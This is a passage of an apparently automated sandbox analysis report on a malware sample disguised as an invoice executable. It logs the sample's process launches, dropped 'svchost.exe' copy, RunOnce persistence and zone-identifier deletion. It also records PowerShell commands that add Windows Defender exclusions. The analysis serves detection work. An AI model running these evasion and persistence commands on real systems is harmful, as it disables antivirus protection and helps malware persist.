        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: unknownProcess created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
        Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
        Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744
        Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
        Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe'
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152
        Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: CN-Invoice-XXXXX9808-19011143287989.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: \??\C:\Windows\mscorlib.pdb( source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
        Source: Binary string: .pdb> source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InprocHandler32 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.947810934.0000000004259000.00000004.00000001.sdmp, AdvancedRun.exe, 00000007.00000000.684807713.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000008.00000000.689085793.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.956430170.0000000004089000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.952453170.00000000046E9000.00000004.00000001.sdmp
        Source: Binary string: npMiVisualBasic.pdbT]_ source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
        Source: Binary string: mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968675958.0000000006138000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.894686332.0000000000F97000.00000004.00000010.sdmp
        Source: Binary string: \??\C:\Windows\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb2F source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: \??\C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.PDB source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900769927.000000000164C000.00000004.00000020.sdmp
        Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968712538.0000000006143000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.900110608.0000000001603000.00000004.00000020.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb00 source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.968605893.0000000006120000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        Binary contains a suspicious time stampShow sources
        Source: initial sampleStatic PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_0040B50D push ecx; ret
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 8_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 8_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 8_2_0040B50D push ecx; ret
        Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeCode function: 22_2_01BF0BD8 push es; ret

        Persistence and Installation Behavior:

        barindex
        Drops PE files with benign system namesShow sources
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exeJump to dropped file
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeFile created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQLJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQLJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQLJump to behavior
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce NtxOsDXQLJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exeCode function: 7_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
